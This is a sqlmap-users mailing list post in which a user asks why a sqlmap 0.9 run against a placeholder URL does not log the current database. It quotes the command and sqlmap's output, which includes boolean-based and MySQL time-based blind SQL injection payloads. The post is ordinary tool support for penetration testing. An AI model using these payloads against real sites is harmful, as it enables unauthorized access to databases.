Hello,
I'm trying to manually reproduce a blind sql injection that sqlmap ( 0.9 )
found.
here is how I ran it.
./sqlmap.py -v 6 --level 5 -u "http://site?id=9"; --current-db -t debug.log
debug.log does not show any sign of a current-db ( that is in output/site/log )
What am I missing?
sqlmap identified the following injection points with a total of 403 HTTP(s)
requests:
---
log shows:
Place: GET
Parameter: fid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9' AND 8437=8437 AND 'oCOc'='oCOc
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=9' AND SLEEP(5) AND 'BKLq'='BKLq
---current database: 'dbname'
------------------------------------------------------------------------------
Special Offer -- Download ArcSight Logger for FREE!
Finally, a world-class log management solution at an even better
price-free! And you'll get a free "Love Thy Logs" t-shirt when you
download Logger. Secure your free ArcSight Logger TODAY!
http://p.sf.net/sfu/arcsisghtdev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
